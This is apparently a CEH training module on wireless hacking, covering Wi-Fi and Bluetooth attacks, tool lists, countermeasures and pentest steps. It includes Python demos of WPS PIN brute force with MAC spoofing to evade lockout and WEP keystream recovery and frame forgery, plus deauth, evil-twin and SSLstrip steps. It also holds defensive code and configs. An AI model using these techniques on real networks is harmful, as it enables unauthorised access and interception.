14 Ceh Hacking Wireless Networks
Hacking Wireless Networks
Goals
• Understand Wireless Concepts
• Understand Wireless Encryption Algorithms
• Understand Wireless Threats
• Understand Wireless Hacking Methodologies
• Learn Wireless Hacking Tools
• Understand Bluetooth Hacking Techniques
• Understand Countermeasures to Wireless Hacking
• Learn Wireless Security Tools
• Understand Wireless Penetration Testing
Module 14.0 Hacking Wireless Networks
• 14.1 Wireless Concepts
• 14.2 Wireless Discovery and Mapping
• 14.3 Wi-Fi Sniffers
• 14.4 Wi-Fi Attacks
• 14.5 Wi-Fi Cracking
• 14.6 Wireless Hacking Tools
• 14.7 Bluetooth Hacking
• 14.8 Wireless Hacking Countermeasures
• 14.9 Wireless Security Tools
• 14.10 Wireless Penetration Testing
14.1 Wireless Concepts
Wireless Network Basics
• Wireless Local Area Networks (WLAN)
• Based on the IEEE 802.11 standard
• Uses radio channels for communication
• Devices connect to the network via a wireless network access point
• Advantages
• Disadvantages
Wireless Network Advantages and Disadvantages
• Advantages
• Fast, easy installation
• Easy connectivity where cables can't easily be used
• Internet access from anywhere in range of an access point
• Free internet connections in many public places
• Disadvantages
• Security is a concern: the medium is shared and anyone in range can receive the signal
• Bandwidth is shared, so the more devices on the network the less throughput each one gets
• Upgrades may need new wireless access points and/or wireless cards
• Wi-Fi networks can be disrupted by some electronic equipment (microwave ovens, cordless phones, other radios in the same band)
Wireless Terminology
• GSM
• Bandwidth
• BSSID (the MAC address of the access point radio)
• ISM Band (the unlicensed 2.4 GHz and 5 GHz bands Wi-Fi uses)
• Access Point
• Hotspot
• Association (the step after authentication that joins a client to the access point's service set)
• Orthogonal Frequency-division Multiplexing (OFDM)
• Direct-sequence Spread Spectrum (DSSS)
• Frequency-hopping Spread Spectrum (FHSS)
How are Wired and Wireless Networks Different?
• Most attacks that work on wired networks also work against Wi-Fi, with no physical access required
• Sniffing
• Spoofing
• MITM/Hijacking
• Deauthentication (a wireless-only attack: management frames are unauthenticated unless 802.11w is enabled)
• DoS
• There are additional wireless network technologies that have their own vulnerabilities
• RFID
• NFC
• Bluetooth
• Cellular
Wireless Network Types
• Extended to Wired Network
• LAN-to-LAN Wireless Network
• Multiple Access Points
• 3G/4G Hotspot
Accessing Wireless Networks: 802.11 and Related Standards
• 802.11a (5 GHz, up to 54 Mbps, OFDM)
• 802.11b (2.4 GHz, up to 11 Mbps, DSSS)
• 802.11g (2.4 GHz, up to 54 Mbps, OFDM)
• 802.11i (security amendment, not a radio standard: defines RSN, i.e. WPA2 with AES-CCMP)
• 802.11n (2.4/5 GHz, MIMO, up to 600 Mbps)
• 802.11ac (5 GHz, gigabit-class rates)
• 802.16 (WiMAX)
• 802.15 (WPAN; Bluetooth is 802.15.1)
Service Set Identifier (SSID)
• A token (up to 32 bytes) used to identify an 802.11 network
• A single identifier shared by the client and the access point
• Broadcast continuously by the access point in beacon frames
• SSID consists of human-readable text
• SSID on each host must be reconfigured when the network SSID is changed
• Clients can use non-secure access mode to connect to a blank, configured, or "any" SSID
• Default values must be changed to ensure security
• On "closed" networks the SSID is omitted from beacons, but it is not secret: it still appears in cleartext in probe requests, probe responses and association requests, so a sniffer recovers it as soon as any client connects
Authentication Modes for Wi-Fi
• Open-System Authentication
• No key; any client is accepted, and encryption (if any) is negotiated afterwards
• Shared-Key Authentication (WEP)
• Password is set on the WAP and clients; the challenge/response leaks keystream, making it weaker than open authentication with WEP
• 802.1X (WPA/WPA2-Enterprise)
• Port-based access control: the client (supplicant) authenticates with EAP through the AP (authenticator) to a RADIUS server before it gets network access
• Captive portal (often mislabeled as 802.1X)
• Typically the WAP is open
• Client obtains a DHCP lease
• Client browser opens/is redirected to a captive portal
• Sometimes other protocols (DNS, ICMP) are permitted even if the browser can't connect, which allows tunneling past the portal
• Login is sent to a RADIUS/TACACS/TACACS+ server
• Client caches a short-term session token, usually tied to its MAC/IP, so spoofing an already-authenticated client's MAC bypasses the portal
Wi-Fi Chalking
• WarWalking: Attackers on foot use Wi-Fi-enabled laptops to identify
open networks
• WarChalking: Drawing symbols in public areas to indicate open
networks
• WarFlying: Attackers use drones to identify open networks
• WarDriving: Attackers use a vehicle to move around with Wi-Fi-
enabled laptops and identify open networks
Wi-Fi Chalking Symbols
• Free Wi-Fi
• Wi-Fi with WEP
• Wi-Fi with MAC Filtering
• Wi-Fi with Multiple
Access Controls
• Restricted Wi-Fi
• Wi-Fi with Closed SSID
• Pay for Wi-Fi
• Wi-Fi Honeypot
Wireless Network Antennas
• Directional antenna
• Omnidirectional antenna
• Parabolic Grid antenna
• Yagi antenna
• Dipole antenna
14.2 Wireless Discovery and Mapping
Wireless Discovery
• Attackers must first discover and footprint a wireless network
• Footprinting can be active (sending probe requests) or passive (listening in monitor mode for beacons and probe responses)
• Finding a wireless network:
• Attacker first enumerates every network in range
• Attacker moves around with a wireless laptop to find active networks
Wireless Discovery Tools
• inSSIDer
• NetSurveyor
• Vistumbler
• NetStumbler
• WirelessMon
• Kismet
• WiFi Hopper
• Wavestumbler
• iStumbler
• WiFinder
• Wellenreiter
• AirCheck Wi-Fi Tester
• AirRaider 2
• Xirrus Wi-Fi Inspector
• WiFi Finder
• WeFi
InSSIDer Example
Mobile Wireless Discovery Tools
• WiFiFoFum-WiFi Scanner
• WiFi Manager
• Network Signal Info
• OpenSignal Maps
• Fing
• Overlook WiFi
GPS Mapping
• Attacker makes map and database of Wi-Fi networks
• Uses GPS to track Wi-Fi network location and uploads coordinates to
site
• Attackers share or sell information
GPS Mapping Tools
• WiGLE
• Skyhook
• TamoGraph
• WiFi Site Survey
• Fluke Airmagnet
14.3 Wi-Fi Sniffers
Wireless Traffic Analysis
• Find Vulnerabilities
• Do Wi-Fi Reconnaissance
• Use Tool to Conduct Analysis
• Select the appropriate card/chipset
Wireless Sniffing
• Use sniffers like Wireshark to capture frames that traverse the air
• An interface will by default receive only transmissions bound for it
• Promiscuous mode only shows traffic of the network the card is associated with; to capture all 802.11 frames on a channel (beacons, probes, handshakes, other BSSs) the card must support monitor mode (e.g. airmon-ng start wlan0)
• Sniffing can enable eavesdropping on communications
• More viable on open Wi-Fi, where payloads are in cleartext
• Encryption largely mitigates payload eavesdropping
• Some information is sent in cleartext regardless of encryption mode: 802.11 headers (MAC addresses, BSSID), beacons, probe requests/responses and the EAPOL handshake are never encrypted
• Use captured MAC addresses in spoofing attacks
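To make the "cleartext despite encryption" point concrete, the following Python example (added here; it is not code from the slides) parses raw 802.11 beacon and probe-response frames and builds an inventory of BSSID, SSID, channel, privacy bit and RSN presence. The frames are constructed inline by a helper so the example runs offline; in practice they come from a monitor-mode interface or a pcap. It also shows that a "hidden" SSID is only absent from the beacon: the unicast probe response to a client carries it, along with the client's MAC. The MAC addresses and SSIDs are made up.

```python
import struct

# 802.11 constants (from the standard, not the slides)
BEACON, PROBE_RESP = 0x08, 0x05            # management-frame subtypes
IE_SSID, IE_DS_PARAM, IE_RSN = 0, 3, 48    # tagged-parameter IDs
CAP_PRIVACY = 0x0010                       # capability bit: data frames are encrypted

# Constructed addresses for the sample capture
AP, AP2, CLIENT = "00:11:22:33:44:55", "00:11:22:33:44:66", "66:77:88:99:aa:bb"


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_mgmt_frame(subtype, da, sa, bssid, ssid, channel, rsn=True, hidden=False):
    """Fabricate a minimal beacon / probe response so the example runs offline.
    Real frames come from a monitor-mode interface (scapy, pyshark) or a pcap."""
    header = (bytes([subtype << 4, 0x00]) + b"\x00\x00"           # frame control, duration
              + mac_bytes(da) + mac_bytes(sa) + mac_bytes(bssid) + b"\x00\x00")  # seq ctrl
    body = struct.pack("<QHH", 0, 100, CAP_PRIVACY if rsn else 0)  # timestamp, interval, capability
    ssid_bytes = b"" if hidden else ssid.encode()
    body += bytes([IE_SSID, len(ssid_bytes)]) + ssid_bytes
    body += bytes([IE_DS_PARAM, 1, channel])
    if rsn:  # RSN element advertising WPA2-PSK with CCMP
        rsn_ie = bytes.fromhex("0100000fac040100000fac040100000fac020000")
        body += bytes([IE_RSN, len(rsn_ie)]) + rsn_ie
    return header + body


def parse_ies(body):
    """Walk the (id, length, value) tagged parameters after the fixed fields."""
    ies, i = {}, 0
    while i + 2 <= len(body):
        tag, length = body[i], body[i + 1]
        ies[tag] = body[i + 2:i + 2 + length]
        i += 2 + length
    return ies


def parse_mgmt(frame):
    """Decode the always-cleartext header plus the IEs of beacons / probe responses."""
    if len(frame) < 36:
        return None
    fc0 = frame[0]
    ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
    if ftype != 0 or subtype not in (BEACON, PROBE_RESP):
        return None                                  # data/control or other mgmt: skip
    addr1, addr2, addr3 = frame[4:10], frame[10:16], frame[16:22]
    _timestamp, _interval, cap = struct.unpack_from("<QHH", frame, 24)
    ies = parse_ies(frame[36:])
    raw_ssid = ies.get(IE_SSID, b"")
    # Hidden networks beacon a zero-length (or all-NUL) SSID; probe responses do not.
    hidden = not raw_ssid or raw_ssid.count(0) == len(raw_ssid)
    return {
        "subtype": "beacon" if subtype == BEACON else "probe_resp",
        "bssid": mac_str(addr3), "src": mac_str(addr2), "dst": mac_str(addr1),
        "ssid": None if hidden else raw_ssid.decode(errors="replace"),
        "channel": ies[IE_DS_PARAM][0] if IE_DS_PARAM in ies else None,
        "privacy": bool(cap & CAP_PRIVACY),
        "rsn": IE_RSN in ies,
    }


def inventory(frames):
    """Merge per-BSSID facts; a probe response fills in the SSID a hidden beacon withholds."""
    nets = {}
    for frame in frames:
        info = parse_mgmt(frame)
        if info is None:
            continue
        entry = nets.setdefault(info["bssid"], {"ssid": None, "clients": set()})
        if info["ssid"] is not None:
            entry["ssid"] = info["ssid"]
        entry.update(channel=info["channel"], privacy=info["privacy"], rsn=info["rsn"])
        if info["subtype"] == "probe_resp":
            entry["clients"].add(info["dst"])        # unicast reply exposes the client MAC
    return nets


# Constructed sample capture: a hidden WPA2 network, its probe response to a client, and an open AP
SAMPLE_FRAMES = [
    build_mgmt_frame(BEACON, "ff:ff:ff:ff:ff:ff", AP, AP, "CorpNet", 6, hidden=True),
    build_mgmt_frame(PROBE_RESP, CLIENT, AP, AP, "CorpNet", 6),
    build_mgmt_frame(BEACON, "ff:ff:ff:ff:ff:ff", AP2, AP2, "GuestWiFi", 11, rsn=False),
]

if __name__ == "__main__":
    for bssid, entry in inventory(SAMPLE_FRAMES).items():
        print(bssid, entry)
```

Nothing here touches a key: every field the inventory reports is read from unencrypted management frames, which is why hiding the SSID or relying on MAC filtering does not keep these facts from an attacker.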
Wireless Sniffing (cont'd)
WPS Exploits
• WPS (Wi-Fi Protected Setup) is an attempt to streamline Wi-Fi setup/device enrollment
• Clients use an 8-digit PIN to connect
• The registrar validates each PIN half separately (first half in M4, second half in M6), and the 8th digit is a checksum of the first seven
• Only 10^4 + 10^3 = 11,000 possible values instead of 10^8
• Easy to crack within hours
• Lockout policies can hamper online PIN cracking
• Might take a couple of weeks, but still feasible
• Lockout may key on MAC address, so spoofing could be used to bypass it
• Brute forcing may trigger DoS on certain WAPs
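The following Python example (added here, not from the slides or from Reaver) shows where the 11,000 figure comes from. It implements the WPS PIN checksum digit, a mock registrar that, like a real AP, tells the client which half of the PIN failed, and a half-by-half brute force that rotates its source MAC when the mock lockout triggers. The registrar and its per-MAC lockout are a simulation of the behaviour the slide describes (real exchanges are EAP-WSC M1..M8 messages), and the PIN values and MAC prefix are made up.

```python
import itertools


def wps_checksum(first7):
    """Checksum digit for a 7-digit PIN prefix: weights 3,1,3,1,... from the
    least significant digit, as in the WPS specification."""
    accum, n = 0, first7
    while n:
        accum += 3 * (n % 10)
        n //= 10
        accum += n % 10
        n //= 10
    return (10 - accum % 10) % 10


def valid_pin(pin):
    """True if the 8-digit PIN carries a correct checksum digit."""
    return pin % 10 == wps_checksum(pin // 10)


class MockRegistrar:
    """Stand-in for the AP side of WPS (constructed for this example). It leaks
    which half failed, which is the whole problem, and locks a MAC after
    `lock_after` failures, modelling the lockout policy the slide mentions."""

    def __init__(self, pin, lock_after=10):
        self.pin = f"{pin:08d}"
        self.lock_after = lock_after
        self.failures = {}
        self.pin_checks = 0          # PIN verifications the AP actually performed

    def try_pin(self, mac, pin):
        if self.failures.get(mac, 0) >= self.lock_after:
            return "locked"
        self.pin_checks += 1
        pin = f"{pin:08d}"
        if pin[:4] != self.pin[:4]:  # M4 stage: first half wrong
            self.failures[mac] = self.failures.get(mac, 0) + 1
            return "half1_bad"
        if pin[4:] != self.pin[4:]:  # M6 stage: second half wrong
            self.failures[mac] = self.failures.get(mac, 0) + 1
            return "half2_bad"
        return "ok"


def brute_force(registrar, spoof_mac=True):
    """Recover the PIN half by half: at most 10^4 + 10^3 = 11,000 verifications."""
    macs = (f"02:00:00:{i >> 16 & 0xff:02x}:{i >> 8 & 0xff:02x}:{i & 0xff:02x}"
            for i in itertools.count())          # locally administered, made-up MACs
    mac = next(macs)

    def attempt(pin):
        nonlocal mac
        while True:
            result = registrar.try_pin(mac, pin)
            if result != "locked":
                return result
            if not spoof_mac:
                raise RuntimeError("locked out and MAC spoofing disabled")
            mac = next(macs)                      # lockout is keyed on MAC: use a new one

    for half1 in range(10_000):
        result = attempt(half1 * 10_000)          # second half is irrelevant at this stage
        if result == "ok":
            return half1 * 10_000
        if result == "half2_bad":                 # first half confirmed
            break
    else:
        return None
    for half2 in range(1_000):                    # checksum fixes the 8th digit
        candidate = half1 * 10_000 + half2 * 10 + wps_checksum(half1 * 1_000 + half2)
        if attempt(candidate) == "ok":
            return candidate
    return None


if __name__ == "__main__":
    ap = MockRegistrar(99999995)                  # worst-case PIN for this search order
    print(brute_force(ap), "found after", ap.pin_checks, "checks")
```

With the mock lockout in place and spoofing disabled, the attack stalls after ten failures; with spoofing it completes, which is exactly why MAC-based lockouts do not fix WPS and the only reliable countermeasure is disabling it.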
Cracking Wireless Encryption – WPA/WEP Cracking Tools
• Aircrack-ng
• Besside-ng
• KisMAC
• Cain & Abel
• Elcomsoft Wireless Security Auditor
• WepAttack
• Wesside-ng
• Reaver Pro
• WEPCrack
• WepDecrypt
• Portable Penetrator
• CloudCracker
• coWPAtty
• Wifite
• WepCrackGui
• Penetrate Pro
• Fern WiFi Cracker
WPS Reaver Attack Example
14.6 Wireless Hacking Tools
Sniffers
• Kismet
• Wireshark
• Airodump-ng
• Vericode
• Monitis
Wardriving Tools
• Airbase-ng
• ApSniff
• WiFiFoFum
• MiniStumbler
• WarLinux
• MacStumbler
• WiFi-Where
• AirFart
• AirTraf
• 802.11 Network Discovery Tools
Monitors
• NetworkManager
• KWiFiManager
• NetworkControl
• Sentry Edge II
• WaveNode
• xosview
• RF Monitor
• DTC-340 RFXpert
• RF Explorer
• Home Curfew RF Monitoring System
• SigMon
Analyzer Tools
• AirMagnet WiFi Analyzer
• OptiView XG Network Analysis Tablet
• Observer
• Ufasoft Snif
• vxSniffer
• OneTouch AT Network Assistant
• Capsa Network Analyzer
• SoftPerfect Network Protocol Analyzer
• OmniPeek Network Analyzer
• CommView for WiFi
Packet Capturing Tools
• WirelessNetView
• Tcpdump
• Airview
• RawCap
• Airodump-ng
Spectrum Analysis Tools
• Cisco Spectrum Expert
• AirMedic USB
• AirSleuth-Pro
• BumbleBee-LX Spectrum Analyzer
• Wi-Spy
MITM / Evil Twin Tools
• Karma
• Wi-Fi Pumpkin
• Wi-Fi Pineapple
Mobile Hacking Tools
• WiHack
• Backtrack Simulator
• Wps Wpa Tester
14.7 Bluetooth Hacking
Bluetooth Modes
• Discoverable Modes:
• Discoverable
• Limited Discoverable
• Non-discoverable
• Pairing Modes
• Non-pairable
• Pairable
Bluetooth Threats
• Leaking Personal Information
• Controlling Device Remotely
• Device Bugging
• Social Engineering
• Sending False SMS Messages
• Introduction of Malicious Code
• Hiking Up Phone Bill Causing Financial Stress
• Taking Advantage of Vulnerabilities in Protocols
Bluetooth Attacks
• Bluejacking
• Sending unsolicited messages to Bluetooth-enabled devices
• Bluesnarfing
• Unauthorized information access on a device
• Bluebugging
• Unauthorized system access to a device
• BlueBorne
• Collection of overflow attacks that could result in arbitrary code execution
• Pairing and discoverability are not required on the target
• Requires no user interaction
Bluesnarfing Example
Bluetooth Attacks (cont’d)
• Bluesmacking
• DoS
• BluePrinting
• Remotely discover details about Bluetooth enabled devices
• MAC Spoofing Attack
• Man-in-the-Middle/Impersonation Attack
Bluetooth Hacking Tools
• PhoneSnoop
• BlueScanner
• BH BlueJack
• Bluesnarfer
• btCrawler
• Bluediving
• Blooover II
• btscanner
• CIHwBT
• BT Audit
• Blue Alert
• Blue Sniff
14.8 Wireless Hacking Countermeasures
Defending Against Bluetooth Hacking
• Ensure PIN keys use non-regular patterns
• Ensure device is always in hidden mode
• Keep track of all past paired devices and delete suspicious devices
• Ensure BT is kept disabled unless required
• Never accept pairing requests from unknown devices
• Ensure encryption is enabled when connecting to a PC
Defending Against Bluetooth Hacking (cont’d)
• Keep device network range at its lowest
• Only pair with other devices in a secure area
• Ensure antivirus is installed
• Ensure default security settings are changed to the best possible
standard
• Ensure all BT connections use link encryption
• Ensure encryption is enabled for all wireless communications, not just the pairing step
Wireless Security Layers
• Connection Security
• Wireless Signal Security
• Device Security
• End-user Protection
• Data Protection
• Network Protection
Defending Against Wireless Attacks
Configuration Best Practices:
• Ensure the default SSID is changed once the WLAN is configured
• Ensure remote router login is disabled
• Ensure a router access password is set and firewall protection is enabled
• Ensure MAC address filtering is enabled on routers/access points (a weak control: MAC addresses travel in cleartext and are trivially spoofed, so this adds friction, not security)
• Ensure SSID broadcasts are disabled at access points and the passphrase is changed frequently (hiding the SSID does not stop a sniffer, since clients still send it in probe and association frames)
Defending Against Wireless Attacks (cont'd)
SSID Settings Best Practices:
• Use SSID cloaking if policy requires it, but do not rely on it: the SSID still appears in cleartext in probe and association frames
• Keep passphrases free of the SSID, network/company name, or anything that is easy to guess
• Ensure there is a firewall/packet filter between the AP and the intranet
• Keep wireless signal strength low enough to avoid detection outside the organization
• Regularly verify there are no issues with setup/configuration
• Use extra traffic encryption (VPN or TLS) on top of the Wi-Fi layer
Defending Against Wireless Attacks (cont'd)
Authentication Best Practices:
• Use WPA instead of WEP; WEP is broken and should not be deployed at all
• Ensure access points are in secure locations
• Use WPA2 with AES-CCMP if possible (WPA1 and TKIP are deprecated) and disable WPS
• Ensure all wireless drivers are up to date
• Ensure the network is disabled when it isn't needed
• Ensure authentication via a centralized server (802.1X/EAP to RADIUS, i.e. WPA2-Enterprise)
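The following hostapd configuration fragments (added here as an example; they are not from the slides or any vendor) show a weak access-point setup beside a hardened PSK variant and a centralized 802.1X variant, mapping each best practice above to a concrete setting. The interface name, SSID, RADIUS server address and passphrase placeholders are assumptions; replace the angle-bracket values before use.

```ini
# --- weak: the kind of config that "just works" and fails every check above ---
interface=wlan0
ssid=CorpNet
hw_mode=g
channel=6
# WPA1 with TKIP (RC4) instead of WPA2/CCMP
wpa=1
wpa_pairwise=TKIP
# passphrase contains the SSID and a dictionary word
wpa_passphrase=corpnet123
# WPS enabled and configured: PIN brute force as described in 14.3
wps_state=2
# no management frame protection: deauth floods work
ieee80211w=0

# --- hardened WPA2-Personal ---
interface=wlan0
ssid=CorpNet
hw_mode=g
channel=6
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
# long random passphrase that appears in no wordlist (placeholder)
wpa_passphrase=<32+ random characters>
# WPS off entirely
wps_state=0
# PMF required: deauth/disassoc must be authenticated, so spoofed ones are dropped
ieee80211w=2
# leave the SSID visible; hiding it only moves it into probe frames
ignore_broadcast_ssid=0

# --- hardened WPA2-Enterprise: authentication at a central RADIUS server ---
interface=wlan0
ssid=CorpNet
hw_mode=g
channel=6
wpa=2
wpa_key_mgmt=WPA-EAP
rsn_pairwise=CCMP
ieee8021x=1
# forward EAP to the RADIUS server instead of hostapd's built-in EAP server
eap_server=0
auth_server_addr=<RADIUS server IP>
auth_server_port=1812
auth_server_shared_secret=<RADIUS shared secret>
wps_state=0
ieee80211w=2
```

Each block is a complete hostapd file on its own; only one of the three is meant to be loaded at a time. The 802.1X variant removes the shared passphrase altogether, so there is no PSK handshake to capture and crack offline.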
14.9 Wireless Security Tools
Wireless Security Auditing Tools
• AirMagnet WiFi Analyzer
• Motorola’s AirDefense Services Platform (ADSP)
• Adaptive Wireless IPS
• Aruba RFProtect
Wireless Intrusion Prevention Systems
• Extreme Networks Intrusion Prevention System
• AirMagnet Enterprise
• Dell SonicWALL Clean Wireless
• HP TippingPoint NX Platform NGIPS
• AirTight WIPS
• Network Box IDP
• AirMobile Server
• Wireless Policy Manager (WPM)
• ZENworks Endpoint Security Management
• FortiWiFi
Wireless Predictive Planning Tools
• AirMagnet Planner
• Cisco Prime Infrastructure
• AirTight Planner
• LANPlanner
• RingMaster
• Connect EZ Predictive RF CAD Design
• Ekahau Site Survey (ESS)
• ZonePlanner
• Wi-Fi Planning Tool
• TamoGraph Site Survey
Wireless Vulnerability Scanning Tools
• Zenmap
• Nessus
• OSWA-Assistant
• Network Security Toolkit
• Nexpose Community Edition
• WiFish Finder
• Penetrator Vulnerability Scanning Appliance
• SILICA
• WebSploit
• Airbase-ng
Bluetooth Security Tools
• No automatic pairing
• Turn off discovery
• Bluetooth Firewall
Mobile Wi-Fi Security Tools
• WiFi Protector
• WiFiGuard
• Wifi Inspector
14.10 Wireless Penetration Testing
Steps to Penetration Testing Wireless
• Put the card into monitor mode with airmon-ng, then discover WAPs and their clients with airodump-ng
• Query WAPs for protocols (encryption, cipher and authentication, read from beacon and RSN information elements)
• Use directional antennas for better signal gain
• Use Wireshark to capture unencrypted traffic
• Use the Aircrack-ng suite, Fern WiFi Cracker, or Besside-ng to crack WEP, WPA, WPA2
• Use Karma for MITM attacks
• Use Reaver/Pixie Dust to crack WPS
• Use social engineering/evil twins to capture user passwords wirelessly
Wireless Hacking Review
• IEEE 802.11 Wi-Fi networks are used for data transfer/communication across a radio network
• Wi-Fi infrastructure is made of software and hardware
• Most used encryption: WEP, WPA, and WPA2; WPA2 is the most secure of the three
• WEP uses a 24-bit IV, the RC4 stream cipher, and a CRC-32 checksum (ICV)
• WPA uses TKIP: RC4 with a 128-bit per-packet key and a 64-bit Michael MIC key; WPA2 uses AES-CCMP with a 128-bit temporal key derived from the 256-bit PMK/PSK
• WEP is vulnerable to analytical attacks (IV reuse and keystream recovery)
• Countermeasures to Wi-Fi attack are wireless IDS systems and best practices for configuration, SSID, and authentication
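As a worked example of the wireless IDS countermeasure named above (added here; not code from the slides or from any WIDS product), the following Python reads deauthentication records in the tab-separated form a tshark field export produces and flags two signatures of a deauth attack: a burst of deauths from one transmitter inside a sliding window, and deauths addressed to the broadcast MAC. The sample lines are constructed, and the tshark command in the comment is an assumption to verify against your tshark version rather than something the slides provide.

```python
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"
AP = "00:11:22:33:44:55"             # made-up BSSID for the sample

# Constructed sample of the five tab-separated fields that a command like
#   tshark -i wlan0mon -Y "wlan.fc.type_subtype == 0x0c" -T fields \
#       -e frame.time_epoch -e wlan.sa -e wlan.da -e wlan.bssid -e wlan.fixed.reason_code
# prints for deauth frames (assumed invocation; check it against your tshark).
SAMPLE_LINES = [f"1700000000.000\t{AP}\t66:77:88:99:aa:bb\t{AP}\t3"]        # single, benign
SAMPLE_LINES += [f"{1700000060 + i * 0.002:.3f}\t{AP}\t{BROADCAST}\t{AP}\t7"  # aireplay-ng -0 style burst
                 for i in range(64)]


def parse_line(line):
    ts, sa, da, bssid, reason = line.rstrip("\n").split("\t")
    return {"ts": float(ts), "sa": sa.lower(), "da": da.lower(),
            "bssid": bssid.lower(), "reason": int(reason)}


def detect_deauth_flood(records, window=1.0, threshold=10):
    """Alert once per transmitter when it exceeds `threshold` deauths in any
    `window` seconds, and once per transmitter that deauths the broadcast address.
    The transmitter address is whatever the attacker spoofed (usually the AP's),
    so detection keys on behaviour, not on the address."""
    recent = defaultdict(deque)
    alerts, flagged = [], set()
    for r in sorted(records, key=lambda rec: rec["ts"]):
        if r["da"] == BROADCAST and ("broadcast", r["sa"]) not in flagged:
            flagged.add(("broadcast", r["sa"]))
            alerts.append({"rule": "broadcast_deauth", "sa": r["sa"], "bssid": r["bssid"],
                           "reason": r["reason"], "ts": r["ts"]})
        q = recent[r["sa"]]
        q.append(r["ts"])
        while r["ts"] - q[0] > window:           # drop timestamps outside the window
            q.popleft()
        if len(q) > threshold and ("rate", r["sa"]) not in flagged:
            flagged.add(("rate", r["sa"]))
            alerts.append({"rule": "rate", "sa": r["sa"], "bssid": r["bssid"],
                           "count": len(q), "ts": r["ts"]})
    return alerts


def analyze(lines, **kwargs):
    """Convenience wrapper: raw export lines in, alerts out."""
    return detect_deauth_flood([parse_line(line) for line in lines], **kwargs)


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LINES):
        print(alert)
```

A single reason-code-3 deauth for an idle client is normal and produces nothing; the broadcast burst triggers the broadcast rule on its first frame and the rate rule on the eleventh. Tune `threshold` and `window` to the roaming behaviour of your own site, and remember that with 802.11w enabled the spoofed frames are rejected by clients anyway, which is the real fix.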
Penetrating Wireless Networks Review
• Use aircrack-ng to crack keys on Wi-Fi networks secured with WEP
• Use an ARP replay attack (aireplay-ng -3) to make the AP emit frames under fresh IVs rapidly; with only 2^24 IVs, reuse is guaranteed
• Speed up WEP cracking with a fragmentation attack using aireplay-ng
• Use the PRGA obtained from fragmentation to craft a packet with packetforge-ng
• Send a crafted packet to an AP to easily obtain thousands of IVs
• Check the laws in your area before using radio jamming devices
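The following Python example (added here; not code from the slides or from the aircrack-ng project) walks through the WEP weaknesses the bullets above rely on: it implements RC4 and WEP data encapsulation, encrypts two frames under the same 24-bit IV to show that their XOR cancels the keystream, recovers PRGA bytes from the guessable LLC/SNAP header, and then forges a new frame with a valid ICV under that IV without ever using the key, which is what packetforge-ng does with the PRGA from a fragmentation attack. The key, IV and payloads are made up.

```python
import struct
import zlib


def rc4(key, length):
    """Plain RC4 keystream (KSA + PRGA); WEP seeds it with IV || key."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xff
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xff
        j = (j + S[i]) & 0xff
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xff])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def icv(plaintext):
    """WEP integrity check value: a linear CRC-32, not a MAC."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xffffffff)


def wep_encrypt(key, iv, plaintext):
    """IV(3) || key-id(1) || RC4_{IV||key}(plaintext || ICV)."""
    ks = rc4(iv + key, len(plaintext) + 4)
    return iv + b"\x00" + xor(plaintext + icv(plaintext), ks)


def wep_decrypt(key, frame):
    iv, body = frame[:3], frame[4:]
    pt_icv = xor(body, rc4(iv + key, len(body)))
    pt, tag = pt_icv[:-4], pt_icv[-4:]
    return pt, tag == icv(pt)


# First 8 bytes of nearly every WEP data frame (LLC/SNAP header for IPv4)
LLC_SNAP_IP = bytes.fromhex("aaaa030000000800")


def recover_prga(frame, known_plaintext):
    """Known plaintext -> keystream bytes for this frame's IV (the fragmentation
    attack bootstraps from exactly these 8 bytes)."""
    return xor(frame[4:4 + len(known_plaintext)], known_plaintext)


def forge_with_prga(iv, prga, plaintext):
    """Craft a valid frame under `iv` from recovered keystream alone, no key needed."""
    need = len(plaintext) + 4
    if len(prga) < need:
        raise ValueError(f"need {need} keystream bytes, have {len(prga)}")
    return iv + b"\x00" + xor(plaintext + icv(plaintext), prga[:need])


def demo(key=bytes.fromhex("0102030405"), iv=b"\x11\x22\x33"):
    """IV reuse -> keystream recovery -> forgery, with a made-up 40-bit key and IV."""
    msg_a = LLC_SNAP_IP + b"\x45\x00\x00\x30GET / HTTP/1.0\r\n"
    msg_b = LLC_SNAP_IP + b"\x45\x00\x00\x30hello world!!!!!"
    frame_a = wep_encrypt(key, iv, msg_a)
    frame_b = wep_encrypt(key, iv, msg_b)            # same IV reused: 2^24 run out fast
    # 1. C_a xor C_b == P_a xor P_b: keystream cancels, plaintext structure leaks
    pt_xor = xor(frame_a[4:], frame_b[4:])
    # 2. eight guessable LLC/SNAP bytes give eight keystream bytes for this IV
    prga8 = recover_prga(frame_a, LLC_SNAP_IP)
    # 3. fragmentation would extend that to a full-MTU PRGA; here the whole plaintext
    #    is known, so recover the keystream over the entire frame and forge with it
    prga_full = recover_prga(frame_a, msg_a + icv(msg_a))
    forged = forge_with_prga(iv, prga_full, LLC_SNAP_IP + b"forged ARP here!")
    pt, accepted = wep_decrypt(key, forged)          # the AP would accept this frame
    return {"pt_xor": pt_xor,
            "prga8_correct": prga8 == rc4(iv + key, 8),
            "forged_accepted": accepted and pt == LLC_SNAP_IP + b"forged ARP here!"}


if __name__ == "__main__":
    print(demo())
```

The forged frame decrypts to the attacker's plaintext with a correct ICV even though the key never appears in `forge_with_prga`; in a live attack the forged packet is an ARP request, so the AP rebroadcasts it under new IVs and feeds aircrack-ng the statistics it needs.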
Penetrating Wireless Networks Review (cont'd)
• Use a tool like aireplay-ng (-0) to knock clients off a WAP
• Spoof MAC addresses in deauthentication attacks; the frames are unauthenticated unless 802.11w (PMF) is enabled
• Use evil twins to entice users to connect to your rogue AP
• Use Karma attacks, answering every client probe request, to trick the client into connecting to the evil twin
• Use SSLstrip with an evil twin to downgrade a user's HTTPS session (sites on the HSTS preload list resist this)
• Place your wireless interface in monitor mode to receive all available frames
• Use airodump-ng to capture the four-way handshake for offline WPA/WPA2 key cracking
